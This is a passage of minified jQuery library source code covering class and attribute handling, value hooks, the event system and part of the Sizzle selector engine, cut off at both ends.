");for(s=0,o=n.length;s<o;s++)while(r.indexOf(" "+n[s]+" ")>=0)r=r.replace(" "+n[s]+" "," ");i.className=e?v.trim(r):""}}}return this},toggleClass:function(e,t){var n=typeof e,r=typeof t=="boolean";return v.isFunction(e)?this.each(function(n){v(this).toggleClass(e.call(this,n,this.className,t),t)}):this.each(function(){if(n==="string"){var i,s=0,o=v(this),u=t,a=e.split(y);while(i=a[s++])u=r?u:!o.hasClass(i),o[u?"addClass":"removeClass"](i)}else if(n==="undefined"||n==="boolean")this.className&&v._data(this,"__className__",this.className),this.className=this.className||e===!1?"":v._data(this,"__className__")||""})},hasClass:function(e){var t=" "+e+" ",n=0,r=this.length;for(;n<r;n++)if(this[n].nodeType===1&&(" "+this[n].className+" ").replace(q," ").indexOf(t)>=0)return!0;return!1},val:function(e){var n,r,i,s=this[0];if(!arguments.length){if(s)return n=v.valHooks[s.type]||v.valHooks[s.nodeName.toLowerCase()],n&&"get"in n&&(r=n.get(s,"value"))!==t?r:(r=s.value,typeof r=="string"?r.replace(R,""):r==null?"":r);return}return i=v.isFunction(e),this.each(function(r){var s,o=v(this);if(this.nodeType!==1)return;i?s=e.call(this,r,o.val()):s=e,s==null?s="":typeof s=="number"?s+="":v.isArray(s)&&(s=v.map(s,function(e){return e==null?"":e+""})),n=v.valHooks[this.type]||v.valHooks[this.nodeName.toLowerCase()];if(!n||!("set"in n)||n.set(this,s,"value")===t)this.value=s})}}),v.extend({valHooks:{option:{get:function(e){var t=e.attributes.value;return!t||t.specified?e.value:e.text}},select:{get:function(e){var t,n,r=e.options,i=e.selectedIndex,s=e.type==="select-one"||i<0,o=s?null:[],u=s?i+1:r.length,a=i<0?u:s?i:0;for(;a<u;a++){n=r[a];if((n.selected||a===i)&&(v.support.optDisabled?!n.disabled:n.getAttribute("disabled")===null)&&(!n.parentNode.disabled||!v.nodeName(n.parentNode,"optgroup"))){t=v(n).val();if(s)return t;o.push(t)}}return o},set:function(e,t){var n=v.makeArray(t);return v(e).find("option").each(function(){this.selected=v.inArray(v(this).val(),n)>=0}),n.length||(e.selectedIndex=-1),n}}},attrFn:{},attr:function(e,n,r,i){var s,o,u,a=e.nodeType;if(!e||a===3||a===8||a===2)return;if(i&&v.isFunction(v.fn[n]))return v(e)[n](r);if(typeof e.getAttribute=="undefined")return v.prop(e,n,r);u=a!==1||!v.isXMLDoc(e),u&&(n=n.toLowerCase(),o=v.attrHooks[n]||(X.test(n)?F:j));if(r!==t){if(r===null){v.removeAttr(e,n);return}return o&&"set"in o&&u&&(s=o.set(e,r,n))!==t?s:(e.setAttribute(n,r+""),r)}return o&&"get"in o&&u&&(s=o.get(e,n))!==null?s:(s=e.getAttribute(n),s===null?t:s)},removeAttr:function(e,t){var n,r,i,s,o=0;if(t&&e.nodeType===1){r=t.split(y);for(;o<r.length;o++)i=r[o],i&&(n=v.propFix[i]||i,s=X.test(i),s||v.attr(e,i,""),e.removeAttribute(V?i:n),s&&n in e&&(e[n]=!1))}},attrHooks:{type:{set:function(e,t){if(U.test(e.nodeName)&&e.parentNode)v.error("type property can't be changed");else if(!v.support.radioValue&&t==="radio"&&v.nodeName(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}},value:{get:function(e,t){return j&&v.nodeName(e,"button")?j.get(e,t):t in e?e.value:null},set:function(e,t,n){if(j&&v.nodeName(e,"button"))return j.set(e,t,n);e.value=t}}},propFix:{tabindex:"tabIndex",readonly:"readOnly","for":"htmlFor","class":"className",maxlength:"maxLength",cellspacing:"cellSpacing",cellpadding:"cellPadding",rowspan:"rowSpan",colspan:"colSpan",usemap:"useMap",frameborder:"frameBorder",contenteditable:"contentEditable"},prop:function(e,n,r){var i,s,o,u=e.nodeType;if(!e||u===3||u===8||u===2)return;return o=u!==1||!v.isXMLDoc(e),o&&(n=v.propFix[n]||n,s=v.propHooks[n]),r!==t?s&&"set"in s&&(i=s.set(e,r,n))!==t?i:e[n]=r:s&&"get"in s&&(i=s.get(e,n))!==null?i:e[n]},propHooks:{tabIndex:{get:function(e){var n=e.getAttributeNode("tabindex");return n&&n.specified?parseInt(n.value,10):z.test(e.nodeName)||W.test(e.nodeName)&&e.href?0:t}}}}),F={get:function(e,n){var r,i=v.prop(e,n);return i===!0||typeof i!="boolean"&&(r=e.getAttributeNode(n))&&r.nodeValue!==!1?n.toLowerCase():t},set:function(e,t,n){var r;return t===!1?v.removeAttr(e,n):(r=v.propFix[n]||n,r in e&&(e[r]=!0),e.setAttribute(n,n.toLowerCase())),n}},V||(I={name:!0,id:!0,coords:!0},j=v.valHooks.button={get:function(e,n){var r;return r=e.getAttributeNode(n),r&&(I[n]?r.value!=="":r.specified)?r.value:t},set:function(e,t,n){var r=e.getAttributeNode(n);return r||(r=i.createAttribute(n),e.setAttributeNode(r)),r.value=t+""}},v.each(["width","height"],function(e,t){v.attrHooks[t]=v.extend(v.attrHooks[t],{set:function(e,n){if(n==="")return e.setAttribute(t,"auto"),n}})}),v.attrHooks.contenteditable={get:j.get,set:function(e,t,n){t===""&&(t="false"),j.set(e,t,n)}}),v.support.hrefNormalized||v.each(["href","src","width","height"],function(e,n){v.attrHooks[n]=v.extend(v.attrHooks[n],{get:function(e){var r=e.getAttribute(n,2);return r===null?t:r}})}),v.support.style||(v.attrHooks.style={get:function(e){return e.style.cssText.toLowerCase()||t},set:function(e,t){return e.style.cssText=t+""}}),v.support.optSelected||(v.propHooks.selected=v.extend(v.propHooks.selected,{get:function(e){var t=e.parentNode;return t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex),null}})),v.support.enctype||(v.propFix.enctype="encoding"),v.support.checkOn||v.each(["radio","checkbox"],function(){v.valHooks[this]={get:function(e){return e.getAttribute("value")===null?"on":e.value}}}),v.each(["radio","checkbox"],function(){v.valHooks[this]=v.extend(v.valHooks[this],{set:function(e,t){if(v.isArray(t))return e.checked=v.inArray(v(e).val(),t)>=0}})});var $=/^(?:textarea|input|select)$/i,J=/^([^\.]*|)(?:\.(.+)|)$/,K=/(?:^|\s)hover(\.\S+|)\b/,Q=/^key/,G=/^(?:mouse|contextmenu)|click/,Y=/^(?:focusinfocus|focusoutblur)$/,Z=function(e){return v.event.special.hover?e:e.replace(K,"mouseenter$1 mouseleave$1")};v.event={add:function(e,n,r,i,s){var o,u,a,f,l,c,h,p,d,m,g;if(e.nodeType===3||e.nodeType===8||!n||!r||!(o=v._data(e)))return;r.handler&&(d=r,r=d.handler,s=d.selector),r.guid||(r.guid=v.guid++),a=o.events,a||(o.events=a={}),u=o.handle,u||(o.handle=u=function(e){return typeof v=="undefined"||!!e&&v.event.triggered===e.type?t:v.event.dispatch.apply(u.elem,arguments)},u.elem=e),n=v.trim(Z(n)).split(" ");for(f=0;f<n.length;f++){l=J.exec(n[f])||[],c=l[1],h=(l[2]||"").split(".").sort(),g=v.event.special[c]||{},c=(s?g.delegateType:g.bindType)||c,g=v.event.special[c]||{},p=v.extend({type:c,origType:l[1],data:i,handler:r,guid:r.guid,selector:s,needsContext:s&&v.expr.match.needsContext.test(s),namespace:h.join(".")},d),m=a[c];if(!m){m=a[c]=[],m.delegateCount=0;if(!g.setup||g.setup.call(e,i,h,u)===!1)e.addEventListener?e.addEventListener(c,u,!1):e.attachEvent&&e.attachEvent("on"+c,u)}g.add&&(g.add.call(e,p),p.handler.guid||(p.handler.guid=r.guid)),s?m.splice(m.delegateCount++,0,p):m.push(p),v.event.global[c]=!0}e=null},global:{},remove:function(e,t,n,r,i){var s,o,u,a,f,l,c,h,p,d,m,g=v.hasData(e)&&v._data(e);if(!g||!(h=g.events))return;t=v.trim(Z(t||"")).split(" ");for(s=0;s<t.length;s++){o=J.exec(t[s])||[],u=a=o[1],f=o[2];if(!u){for(u in h)v.event.remove(e,u+t[s],n,r,!0);continue}p=v.event.special[u]||{},u=(r?p.delegateType:p.bindType)||u,d=h[u]||[],l=d.length,f=f?new RegExp("(^|\\.)"+f.split(".").sort().join("\\.(?:.*\\.|)")+"(\\.|$)"):null;for(c=0;c<d.length;c++)m=d[c],(i||a===m.origType)&&(!n||n.guid===m.guid)&&(!f||f.test(m.namespace))&&(!r||r===m.selector||r==="**"&&m.selector)&&(d.splice(c--,1),m.selector&&d.delegateCount--,p.remove&&p.remove.call(e,m));d.length===0&&l!==d.length&&((!p.teardown||p.teardown.call(e,f,g.handle)===!1)&&v.removeEvent(e,u,g.handle),delete h[u])}v.isEmptyObject(h)&&(delete g.handle,v.removeData(e,"events",!0))},customEvent:{getData:!0,setData:!0,changeData:!0},trigger:function(n,r,s,o){if(!s||s.nodeType!==3&&s.nodeType!==8){var u,a,f,l,c,h,p,d,m,g,y=n.type||n,b=[];if(Y.test(y+v.event.triggered))return;y.indexOf("!")>=0&&(y=y.slice(0,-1),a=!0),y.indexOf(".")>=0&&(b=y.split("."),y=b.shift(),b.sort());if((!s||v.event.customEvent[y])&&!v.event.global[y])return;n=typeof n=="object"?n[v.expando]?n:new v.Event(y,n):new v.Event(y),n.type=y,n.isTrigger=!0,n.exclusive=a,n.namespace=b.join("."),n.namespace_re=n.namespace?new RegExp("(^|\\.)"+b.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,h=y.indexOf(":")<0?"on"+y:"";if(!s){u=v.cache;for(f in u)u[f].events&&u[f].events[y]&&v.event.trigger(n,r,u[f].handle.elem,!0);return}n.result=t,n.target||(n.target=s),r=r!=null?v.makeArray(r):[],r.unshift(n),p=v.event.special[y]||{};if(p.trigger&&p.trigger.apply(s,r)===!1)return;m=[[s,p.bindType||y]];if(!o&&!p.noBubble&&!v.isWindow(s)){g=p.delegateType||y,l=Y.test(g+y)?s:s.parentNode;for(c=s;l;l=l.parentNode)m.push([l,g]),c=l;c===(s.ownerDocument||i)&&m.push([c.defaultView||c.parentWindow||e,g])}for(f=0;f<m.length&&!n.isPropagationStopped();f++)l=m[f][0],n.type=m[f][1],d=(v._data(l,"events")||{})[n.type]&&v._data(l,"handle"),d&&d.apply(l,r),d=h&&l[h],d&&v.acceptData(l)&&d.apply&&d.apply(l,r)===!1&&n.preventDefault();return n.type=y,!o&&!n.isDefaultPrevented()&&(!p._default||p._default.apply(s.ownerDocument,r)===!1)&&(y!=="click"||!v.nodeName(s,"a"))&&v.acceptData(s)&&h&&s[y]&&(y!=="focus"&&y!=="blur"||n.target.offsetWidth!==0)&&!v.isWindow(s)&&(c=s[h],c&&(s[h]=null),v.event.triggered=y,s[y](),v.event.triggered=t,c&&(s[h]=c)),n.result}return},dispatch:function(n){n=v.event.fix(n||e.event);var r,i,s,o,u,a,f,c,h,p,d=(v._data(this,"events")||{})[n.type]||[],m=d.delegateCount,g=l.call(arguments),y=!n.exclusive&&!n.namespace,b=v.event.special[n.type]||{},w=[];g[0]=n,n.delegateTarget=this;if(b.preDispatch&&b.preDispatch.call(this,n)===!1)return;if(m&&(!n.button||n.type!=="click"))for(s=n.target;s!=this;s=s.parentNode||this)if(s.disabled!==!0||n.type!=="click"){u={},f=[];for(r=0;r<m;r++)c=d[r],h=c.selector,u[h]===t&&(u[h]=c.needsContext?v(h,this).index(s)>=0:v.find(h,this,null,[s]).length),u[h]&&f.push(c);f.length&&w.push({elem:s,matches:f})}d.length>m&&w.push({elem:this,matches:d.slice(m)});for(r=0;r<w.length&&!n.isPropagationStopped();r++){a=w[r],n.currentTarget=a.elem;for(i=0;i<a.matches.length&&!n.isImmediatePropagationStopped();i++){c=a.matches[i];if(y||!n.namespace&&!c.namespace||n.namespace_re&&n.namespace_re.test(c.namespace))n.data=c.data,n.handleObj=c,o=((v.event.special[c.origType]||{}).handle||c.handler).apply(a.elem,g),o!==t&&(n.result=o,o===!1&&(n.preventDefault(),n.stopPropagation()))}}return b.postDispatch&&b.postDispatch.call(this,n),n.result},props:"attrChange attrName relatedNode srcElement altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,t){return e.which==null&&(e.which=t.charCode!=null?t.charCode:t.keyCode),e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(e,n){var r,s,o,u=n.button,a=n.fromElement;return e.pageX==null&&n.clientX!=null&&(r=e.target.ownerDocument||i,s=r.documentElement,o=r.body,e.pageX=n.clientX+(s&&s.scrollLeft||o&&o.scrollLeft||0)-(s&&s.clientLeft||o&&o.clientLeft||0),e.pageY=n.clientY+(s&&s.scrollTop||o&&o.scrollTop||0)-(s&&s.clientTop||o&&o.clientTop||0)),!e.relatedTarget&&a&&(e.relatedTarget=a===e.target?n.toElement:a),!e.which&&u!==t&&(e.which=u&1?1:u&2?3:u&4?2:0),e}},fix:function(e){if(e[v.expando])return e;var t,n,r=e,s=v.event.fixHooks[e.type]||{},o=s.props?this.props.concat(s.props):this.props;e=v.Event(r);for(t=o.length;t;)n=o[--t],e[n]=r[n];return e.target||(e.target=r.srcElement||i),e.target.nodeType===3&&(e.target=e.target.parentNode),e.metaKey=!!e.metaKey,s.filter?s.filter(e,r):e},special:{load:{noBubble:!0},focus:{delegateType:"focusin"},blur:{delegateType:"focusout"},beforeunload:{setup:function(e,t,n){v.isWindow(this)&&(this.onbeforeunload=n)},teardown:function(e,t){this.onbeforeunload===t&&(this.onbeforeunload=null)}}},simulate:function(e,t,n,r){var i=v.extend(new v.Event,n,{type:e,isSimulated:!0,originalEvent:{}});r?v.event.trigger(i,null,t):v.event.dispatch.call(t,i),i.isDefaultPrevented()&&n.preventDefault()}},v.event.handle=v.event.dispatch,v.removeEvent=i.removeEventListener?function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n,!1)}:function(e,t,n){var r="on"+t;e.detachEvent&&(typeof e[r]=="undefined"&&(e[r]=null),e.detachEvent(r,n))},v.Event=function(e,t){if(!(this instanceof v.Event))return new v.Event(e,t);e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||e.returnValue===!1||e.getPreventDefault&&e.getPreventDefault()?tt:et):this.type=e,t&&v.extend(this,t),this.timeStamp=e&&e.timeStamp||v.now(),this[v.expando]=!0},v.Event.prototype={preventDefault:function(){this.isDefaultPrevented=tt;var e=this.originalEvent;if(!e)return;e.preventDefault?e.preventDefault():e.returnValue=!1},stopPropagation:function(){this.isPropagationStopped=tt;var e=this.originalEvent;if(!e)return;e.stopPropagation&&e.stopPropagation(),e.cancelBubble=!0},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=tt,this.stopPropagation()},isDefaultPrevented:et,isPropagationStopped:et,isImmediatePropagationStopped:et},v.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(e,t){v.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,s=e.handleObj,o=s.selector;if(!i||i!==r&&!v.contains(r,i))e.type=s.origType,n=s.handler.apply(this,arguments),e.type=t;return n}}}),v.support.submitBubbles||(v.event.special.submit={setup:function(){if(v.nodeName(this,"form"))return!1;v.event.add(this,"click._submit keypress._submit",function(e){var n=e.target,r=v.nodeName(n,"input")||v.nodeName(n,"button")?n.form:t;r&&!v._data(r,"_submit_attached")&&(v.event.add(r,"submit._submit",function(e){e._submit_bubble=!0}),v._data(r,"_submit_attached",!0))})},postDispatch:function(e){e._submit_bubble&&(delete e._submit_bubble,this.parentNode&&!e.isTrigger&&v.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){if(v.nodeName(this,"form"))return!1;v.event.remove(this,"._submit")}}),v.support.changeBubbles||(v.event.special.change={setup:function(){if($.test(this.nodeName)){if(this.type==="checkbox"||this.type==="radio")v.event.add(this,"propertychange._change",function(e){e.originalEvent.propertyName==="checked"&&(this._just_changed=!0)}),v.event.add(this,"click._change",function(e){this._just_changed&&!e.isTrigger&&(this._just_changed=!1),v.event.simulate("change",this,e,!0)});return!1}v.event.add(this,"beforeactivate._change",function(e){var t=e.target;$.test(t.nodeName)&&!v._data(t,"_change_attached")&&(v.event.add(t,"change._change",function(e){this.parentNode&&!e.isSimulated&&!e.isTrigger&&v.event.simulate("change",this.parentNode,e,!0)}),v._data(t,"_change_attached",!0))})},handle:function(e){var t=e.target;if(this!==t||e.isSimulated||e.isTrigger||t.type!=="radio"&&t.type!=="checkbox")return e.handleObj.handler.apply(this,arguments)},teardown:function(){return v.event.remove(this,"._change"),!$.test(this.nodeName)}}),v.support.focusinBubbles||v.each({focus:"focusin",blur:"focusout"},function(e,t){var n=0,r=function(e){v.event.simulate(t,e.target,v.event.fix(e),!0)};v.event.special[t]={setup:function(){n++===0&&i.addEventListener(e,r,!0)},teardown:function(){--n===0&&i.removeEventListener(e,r,!0)}}}),v.fn.extend({on:function(e,n,r,i,s){var o,u;if(typeof e=="object"){typeof n!="string"&&(r=r||n,n=t);for(u in e)this.on(u,n,r,e[u],s);return this}r==null&&i==null?(i=n,r=n=t):i==null&&(typeof n=="string"?(i=r,r=t):(i=r,r=n,n=t));if(i===!1)i=et;else if(!i)return this;return s===1&&(o=i,i=function(e){return v().off(e),o.apply(this,arguments)},i.guid=o.guid||(o.guid=v.guid++)),this.each(function(){v.event.add(this,e,i,r,n)})},one:function(e,t,n,r){return this.on(e,t,n,r,1)},off:function(e,n,r){var i,s;if(e&&e.preventDefault&&e.handleObj)return i=e.handleObj,v(e.delegateTarget).off(i.namespace?i.origType+"."+i.namespace:i.origType,i.selector,i.handler),this;if(typeof e=="object"){for(s in e)this.off(s,n,e[s]);return this}if(n===!1||typeof n=="function")r=n,n=t;return r===!1&&(r=et),this.each(function(){v.event.remove(this,e,r,n)})},bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},live:function(e,t,n){return v(this.context).on(e,this.selector,t,n),this},die:function(e,t){return v(this.context).off(e,this.selector||"**",t),this},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return arguments.length===1?this.off(e,"**"):this.off(t,e||"**",n)},trigger:function(e,t){return this.each(function(){v.event.trigger(e,t,this)})},triggerHandler:function(e,t){if(this[0])return v.event.trigger(e,t,this[0],!0)},toggle:function(e){var t=arguments,n=e.guid||v.guid++,r=0,i=function(n){var i=(v._data(this,"lastToggle"+e.guid)||0)%r;return v._data(this,"lastToggle"+e.guid,i+1),n.preventDefault(),t[i].apply(this,arguments)||!1};i.guid=n;while(r<t.length)t[r++].guid=n;return this.click(i)},hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),v.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(e,t){v.fn[t]=function(e,n){return n==null&&(n=e,e=null),arguments.length>0?this.on(t,null,e,n):this.trigger(t)},Q.test(t)&&(v.event.fixHooks[t]=v.event.keyHooks),G.test(t)&&(v.event.fixHooks[t]=v.event.mouseHooks)}),function(e,t){function nt(e,t,n,r){n=n||[],t=t||g;var i,s,a,f,l=t.nodeType;if(!e||typeof e!="string")return n;if(l!==1&&l!==9)return[];a=o(t);if(!a&&!r)if(i=R.exec(e))if(f=i[1]){if(l===9){s=t.getElementById(f);if(!s||!s.parentNode)return n;if(s.id===f)return n.push(s),n}else if(t.ownerDocument&&(s=t.ownerDocument.getElementById(f))&&u(t,s)&&s.id===f)return n.push(s),n}else{if(i[2])return S.apply(n,x.call(t.getElementsByTagName(e),0)),n;if((f=i[3])&&Z&&t.getElementsByClassName)return S.apply(n,x.call(t.getElementsByClassName(f),0)),n}return vt(e.replace(j,"$1"),t,n,r,a)}function rt(e){return function(t){var n=t.nodeName.toLowerCase();return n==="input"&&t.type===e}}function it(e){return function(t){var n=t.nodeName.toLowerCase();return(n==="input"||n==="button")&&t.type===e}}function st(e){return N(function(t){return t=+t,N(function(n,r){var i,s=e([],n.length,t),o=s.length;while(o--)n[i=s[o]]&&(n[i]=!(r[i]=n[i]))})})}function ot(e,t,n){if(e===t)return n;var r=e.nextSibling;while(r){if(r===t)return-1;r=r.nextSibling}return 1}function ut(e,t){var n,r,s,o,u,a,f,l=L[d][e+" "];if(l)return t?0:l.slice(0);u=e,a=[],f=i.preFilter;while(u){if(!n||(r=F.exec(u)))r&&(u=u.slice(r[0].length)||u),a.push(s=[]);n=!1;if(r=I.exec(u))s.push(n=new m(r.shift())),u=u.slice(n.length),n.type=r[0].replace(j," ");for(o in i.filter)(r=J[o].exec(u))&&(!f[o]||(r=f[o](r)))&&(s.push(n=new m(r.shift())),u=u.slice(n.length),n.type=o,n.matches=r);if(!n)break}return t?u.length:u?nt.error(e):L(e,a).slice(0)}function at(e,t,r){var i=t.dir,s=r&&t.dir==="parentNode",o=w++;return t.first?function(t,n,r){while(t=t[i])if(s||t.nodeType===1)return e(t,n,r)}:function(t,r,u){if(!u){var a,f=b+" "+o+" ",l=f+n;while(t=t[i])if(s||t.nodeType===1){if((a=t[d])===l)return t.sizset;if(typeof a=="string"&&a.indexOf(f)===0){if(t.sizset)return t}else{t[d]=l;if(e(t,r,u))return t.sizset=!0,t;t.sizset=!1}}}else while(t=t[i])if(s||t.nodeType===1)if(e(t,r,u))return t}}function ft(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function lt(e,t,n,r,i){var s,o=[],u=0,a=e.length,f=t!=null;for(;u<a;u++)if(s=e[u])if(!n||n(s,r,i))o.push(s),f&&t.push(u);return o}function ct(e,t,n,r,i,s){return r&&!r[d]&&(r=ct(r)),i&&!i[d]&&(i=ct(i,s)),N(function(s,o,u,a){var f,l,c,h=[],p=[],d=o.length,v=s||dt(t||"*",u.nodeType?[u]:u,[]),m=e&&(s||!t)?lt(v,h,e,u,a):v,g=n?i||(s?e:d||r)?[]:o:m;n&&n(m,g,u,a);if(r){f=lt(g,p),r(f,[],u,a),l=f.length;while(l--)if(c=f[l])g[p[l]]=!(m[p[l]]=c)}if(s){if(i||e){if(i){f=[],l=g.length;while(l--)(c=g[l])&&f.push(m[l]=c);i(null,g=[],f,a)}l=g.length;while(l--)(c=g[l])&&(f=i?T.call(s,c):h[l])>-1&&(s[f]=!(o[f]=c))}}else g=lt(g===o?g.splice(d,g.length):g),i?i(null,o,g,a):S.apply(o,g)})}function ht(e){var t,n,r,s=e.length,o=i.relative[e[0].type],u=o||i.relative[" "],a=o?1:0,f=at(function(e){return e===t},u,!0),l=at(function(e){return T.call(t,e)>-1},u,!0),h=[function(e,n,r){return!o&&(r||n!==c)||((t=n).nodeType?f(e,n,r):l(e,n,r))}];for(;a<s;a++)if(n=i.relative[e[a].type])h=[at(ft(h),n)];else{n=i.filter[e[a].type].apply(null,e[a].matches);if(n[d]){r=++a;for(;r<s;r++)if(i.relative[e[r].type])break;return ct(a>1&&ft(h),a>1&&e.slice(0,a-1).join("").replace(j,"$1"),n,a<r&&ht(e.slice(a,r)),r<s&&ht(e=e.slice(r)),r<s&&e.join(""))}h.push(n)}return ft(h)}function pt(e,t){var r=t.length>0,s=e.length>0,o=function(u,a,f,l,h){var p,d,v,m=[],y=0,w="0",x=u&&[],T=h!=null,N=c,C=u||s&&i.find.TAG("*",h&&a.parentNode||a),k=b+=N==null?1:Math.E;T&&(c=a!==g&&a,n=o.el);for(;(p=C[w])!=null;w++){if(s&&p){for(d=0;v=e[d];d++)if(v(p,a,f)){l.push(p);break}T&&(b=k,n=++o.el)}r&&((p=!v&&p)&&y--,u&&x.push(p))}y+=w;if(r&&w!==y){for(d=0;v=t[d];d++)v(x,m,a,f);if(u){if(y>0)while(w--)!x[w]&&!m[w]&&(m[w]=E.call(l));m=lt(m)}S.apply(l,m),T&&!u&&m.length>0&&y+t.length>1&&nt.uniqueSort(l)}return T&&(b=k,c=N),x};return o.el=0,r?N(o):o}function dt(e,t,n){var r=0,i=t.length;for(;r<i;r++)nt(e,t[r],n);return n}function vt(e,t,n,r,s){var o,u,f,l,c,h=ut(e),p=h.length;if(!r&&h.length===1){u=h[0]=h[0].slice(0);if(u.length>2&&(f=u[0]).type==="ID"&&t.nodeType===9&&!s&&i.relative[u[1].type]){t=i.find.ID(f.matches[0].replace($,""),t,s)[0];if(!t)return n;e=e.slice(u.shift().length)}for(o=J.POS.test(e)?-1:u.length-1;o>=0;o--){f=u[o];if(i.relative[l=f.type])break;if(c=i.find[l])if(r=c(f.matches[0].replace($,""),z.test(u[0].type)&&t.parentNode||t,s)){u.splice(o,1),e=r.length&&u.join("");if(!e)return S.apply(n,x.call(r,0)),n;break}}}return a(e,h)(r,t,s,n,z.test(e)),n}function mt(){}var n,r,i,s,o,u,a,f,l,c,h=!0,p="undefined",d=("sizcache"+Math.random()).replace(".",""),m=String,g=e.document,y=g.documentElement,b=0,w=0,E=[].pop,S=[].push,x=[].slice,T=[].indexOf||function(e){var t=0,n=this.length;for(;t<n;t++)if(this[t]===e)return t;return-1},N=function(e,t){return e[d]=t==null||t,e},C=function(){var e={},t=[];return N(function(n,r){return t.push(n)>i.cacheLength&&delete e[t.shift()],e[n+" "]=r},e)},k=C(),L=C(),A=C(),O="[\\x20\\t\\r\\n\\f]",M="(?:\\\\.|[-\\w]|[^\\x00-\\xa0])+",_=M.replace("w","w#"),D="([*^$|!~]?=)",P="\\["+O+"*("+M+")"+O+"*(?:"+D+O+"*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|("+_+")|)|)"+O+"*\\]",H=":("+M+")(?:\\((?:(['\"])((?:\\\\.|[^\\\\])*?)\\2|([^()[\\]]*|(?:(?:"+P+")|[^:]|\\\\.)*|.*))\\)|)",B=":(even|odd|eq|gt|lt|nth|first|last)(?:\\("+O+"*((?:-\\d)?\\d*)"+O+"*\\)|)(?=[^-]|$)",j=new RegExp("^"+O+"+|((?:^|[^\\\\])(?:\\\\.)*)"+O+"+$","g"),F=new RegExp("^"+O+"*,"+O+"*"),I=new RegExp("^"+O+"*([\\x20\\t\\r\\n\\f>+~])"+O+"*"),q=new RegExp(H),R=/^(?:#([\w\-]+)|(\w+)|\.([\w\-]+))$/,U=/^:not/,z=/[\x20\t\r\n\f]*[+~]/,W=/:not\($/,X=/h\d/i,V=/input|select|textarea|button/i,$=/\\(?!\\)/g,J={ID:new RegExp("^#("+M+")"),CLASS:new RegExp("^\\.("+M+")"),NAME:new RegExp("^\\[name=['\"]?("+M+")['\"]?\\]"),TAG:new RegExp("^("+M.replace("w","w*")+")"),ATTR:new RegExp("^"+P),PSEUDO:new RegExp("^"+H),POS:new RegExp(B,"i"),CHILD:new RegExp("^:(only|nth|first|last)-child(?:\\("+O+"*(even|odd|(([+-]|)(\\d*)n|)"+O+"*(?:([+-]|)"+O+"*(\\d+)|))"+O+"*\\)|)","i"),needsContext:new RegExp("^"+O+"*[>+~]|"+B,"i")},K=function(e){var t=g.createElement("div");try{return e(t)}catch(n){return!1}finally{t=null}},Q=K(function(e){return e.appendChild(g.createComment("")),!e.getElementsByTagName("*").length}),G=K(function(e){return e.innerHTML="<a href='#'></a>",e.firstChild&&typeof e.firstChild.getAttribute!==p&&e.firstChild.getAttribute("href")==="#"}),Y=K(function(e){e.innerHTML="<select></select>";var t=typeof e.lastChild.getAttribute("multiple");return t!=="boolean"&&t!=="string"}),Z=K(function(e){return e.innerHTML="<div class='hidden e'></div><div class='hidden'></div>",!e.getElementsByClassName||!e.getElementsByClassName("e").length?!1:(e.lastChild.className="e",e.getElementsByClassName("e").length===2)}),et=K(function(e){e.id=d+0,e.innerHTML="<a name='"+d+"'></a><div name='"+d+"'></div>",y.insertBefore(e,y.firstChild);var t=g.getElementsByName&&g.getElementsByName(d).length===2+g.getElementsByName(d+0).length;return r=!g.getElementById(d),y.removeChild(e),t});try{x.call(y.childNodes,0)[0].nodeType}catch(tt){x=function(e){var t,n=[];for(;t=this[e];e++)n.push(t);return n}}nt.matches=function(e,t){return nt(e,null,null,t)},nt.matchesSelector=function(e,t){return nt(t,null,null,[e]).length>0},s=nt.getText=function(e){var t,n="",r=0,i=e.nodeType;if(i){if(i===1||i===9||i===11){if(typeof e.textContent=="string")return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=s(e)}else if(i===3||i===4)return e.nodeValue}else for(;t=e[r];r++)n+=s(t);return n},o=nt.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return t?t.nodeName!=="HTML":!1},u=nt.contains=y.contains?function(e,t){var n=e.nodeType===9?e.documentElement:e,r=t&&t.parentNode;return e===r||!!(r&&r.nodeType===1&&n.contains&&n.contains(r))}:y.compareDocumentPosition?function(e,t){return t&&!!(e.compareDocumentPosition(t)&16)}:function(e,t){while(t=t.parentNode)if(t===e)return!0;return!1},nt.attr=function(e,t){var n,r=o(e);return r||(t=t.toLowerCase()),(n=i.attrHandle[t])?n(e):r||Y?e.getAttribute(t):(n=e.getAttributeNode(t),n?typeof e[t]=="boolean"?e[t]?t:null:n.specified?n.value:null:null)},i=nt.selectors={cacheLength:50,createPseudo:N,match:J,attrHandle:G?{}:{href:function(e){return e.getAttribute("href",2)},type:function(e){return e.getAttribute("type")}},find:{ID:r?function(e,t,n){if(typeof t.getElementById!==p&&!n){var r=t.getElementById(e);return r&&r.parentNode?[r]:[]}}:function(e,n,r){if(typeof n.getElementById!==p&&!r){var i=n.getElementById(e);return i?i.id===e||typeof i.getAttributeNode!==p&&i.getAttributeNode("id").value===e?[i]:t:[]}},TAG:Q?function(e,t){if(typeof t.getElementsByTagName!==p)return t.getElementsByTagName(e)}:function(e,t){var n=t.getElementsByTagName(e);if(e==="*"){var r,i=[],s=0;for(;r=n[s];s++)r.nodeType===1&&i.push(r);return i}return n},NAME:et&&function(e,t){if(typeof t.getElementsByName!==p)return t.getElementsByName(name)},CLASS:Z&&function(e,t,n){if(typeof 